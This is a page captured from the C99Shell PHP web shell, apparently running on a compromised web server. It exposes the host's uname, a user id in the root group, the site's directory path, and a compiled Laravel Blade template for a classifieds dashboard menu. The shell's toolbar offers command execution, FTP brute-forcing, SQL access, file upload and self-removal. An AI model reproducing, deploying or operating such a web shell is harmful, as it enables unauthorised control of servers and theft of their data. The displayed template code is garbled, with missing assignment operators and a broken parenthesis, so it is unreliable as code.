!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.29 GB of 117.98 GB (23.98%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     9c4ce0f1f3b04e77e8c79f8fe66dc663.php (6.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="responsive-menu lg:hidden p-6 z-[9999] fixed top-0 ltr:left-0 rtl:right-0 w-full min-w-[300px] max-w-[300px] h-full overflow-y-auto bg-white transition-all duration-300 rtl:translate-x-full ltr:-translate-x-full invisible"
    :class="dashboardMenu ? 'active' : ''">
    <div class="flex flex-col gap-3">
        <div class="flex justify-end items-center">

            <button @click="dashboardMenu = false">
                <?php if (isset($component)) { $__componentOriginal8535c28c95fc85c74277752019685775 $component; } ?>
<?php 
if (isset($attributes)) { $__attributesOriginal8535c28c95fc85c74277752019685775 $attributes; } ?>
<?php $component 
App\View\Components\Svg\CrossIcon::resolve([] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?>
<?php $component
->withName('svg.cross-icon'); ?>
<?php 
if ($component->shouldRender()): ?>
<?php $__env
->startComponent($component->resolveView(), $component->data()); ?>
<?php 
if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(App\View\Components\Svg\CrossIcon::class))->getConstructor()): ?>
<?php $attributes 
$attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?>
<?php 
endif; ?>
<?php $component
->withAttributes([]); ?>
<?php 
echo $__env->renderComponent(); ?>
<?php 
endif; ?>
<?php 
if (isset($__attributesOriginal8535c28c95fc85c74277752019685775)): ?>
<?php $attributes 
$__attributesOriginal8535c28c95fc85c74277752019685775?>
<?php 
unset($__attributesOriginal8535c28c95fc85c74277752019685775); ?>
<?php 
endif; ?>
<?php 
if (isset($__componentOriginal8535c28c95fc85c74277752019685775)): ?>
<?php $component 
$__componentOriginal8535c28c95fc85c74277752019685775?>
<?php 
unset($__componentOriginal8535c28c95fc85c74277752019685775); ?>
<?php 
endif; ?>
            </button>
        </div>
        <?php if(auth('user')->check()): ?>
            <h3 class="heading-07 text-gray-900"><?php echo e(__('dashboard')); ?></h3>
            <ul class="flex flex-col gap-3">
                <li>
                    <a href="<?php echo e(route('frontend.dashboard')); ?>"
                        class="body-md-400 text-gray-700 hover:text-primary-500 transition-all duration-300">
                        <span><?php echo e(__('overview')); ?></span>
                    </a>
                </li>

                <li>
                    <a href="<?php echo e(route('frontend.seller.profile'authUser()->username)); ?>"
                        class="body-md-400 text-gray-700 hover:text-primary-500 transition-all duration-300">
                        <span><?php echo e(__('public_profile')); ?></span>
                    </a>
                </li>

                <li>
                    <a href="<?php echo e(route('frontend.post')); ?>"
                        class="body-md-400 text-gray-700 hover:text-primary-500 transition-all duration-300">
                        <span><?php echo e(__('post_listing')); ?></span>
                    </a>
                </li>

                <li>
                    <a href="<?php echo e(route('frontend.my.listing')); ?>"
                        class="body-md-400 text-gray-700 hover:text-primary-500 transition-all duration-300">
                        <span><?php echo e(__('my_ads')); ?></span>
                    </a>
                </li>
                <li>
                    <a href="<?php echo e(route('frontend.resubmission.list')); ?>"
                        class="body-md-400 text-gray-700 hover:text-primary-500 transition-all duration-300">
                        <span><?php echo e(__('resubmission_request')); ?></span>
                    </a>
                </li>
                <li>
                    <a href="<?php echo e(route('frontend.favorite.list')); ?>"
                        class="body-md-400 text-gray-700 hover:text-primary-500 transition-all duration-300">
                        <span><?php echo e(__('favorite_ads')); ?></span>
                    </a>
                </li>
                <li>
                    <a href="<?php echo e(route('frontend.message')); ?>"
                        class="body-md-400 text-gray-700 hover:text-primary-500 transition-all duration-300">
                        <span><?php echo e(__('message')); ?></span>
                    </a>
                </li>
                <li>
                    <a href="<?php echo e(route('frontend.plans-billing')); ?>"
                        class="body-md-400 text-gray-700 hover:text-primary-500 transition-all duration-300">
                        <span><?php echo e(__('plans_billing')); ?></span>
                    </a>
                </li>
                <li>
                    <a href="<?php echo e(route('frontend.verify.account')); ?>"
                        class="body-md-400 text-gray-700 hover:text-primary-500 transition-all duration-300">
                        <span><?php echo e(__('verify_account')); ?></span>
                    </a>
                </li>
                <li>
                    <a href="<?php echo e(route('frontend.account-setting')); ?>"
                        class="body-md-400 text-gray-700 hover:text-primary-500 transition-all duration-300">
                        <span><?php echo e(__('account_setting')); ?></span>
                    </a>
                </li>
                <li>
                    <a href="javascript:void(0"
                        onclick="event.preventDefault();document.getElementById('menubar-logout-form').submit();"
                        class="body-md-400 text-gray-700 hover:text-primary-500 transition-all duration-300">
                        <span><?php echo e(__('logout')); ?></span>
                    </a>
                </li>
                <form id="menubar-logout-form" action="<?php echo e(route('frontend.logout')); ?>" method="POST"
                    class="hidden invisible">
                    <?php echo csrf_field(); ?>
                </form>
            </ul>
        <?php endif; ?>
    </div>
</div>
<div @click="dashboardMenu = false"
    class="mobile-overlay fixed top-0 left-0 h-full w-full bg-black/50 z-[999] transition-all duration-300 invisible lg:hidden"
    :class="dashboardMenu ? 'active' : ''"></div>
<?php /**PATH E:\add listing 8-9-25\addListing\resources\views/components/frontend/dashboard-menu.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--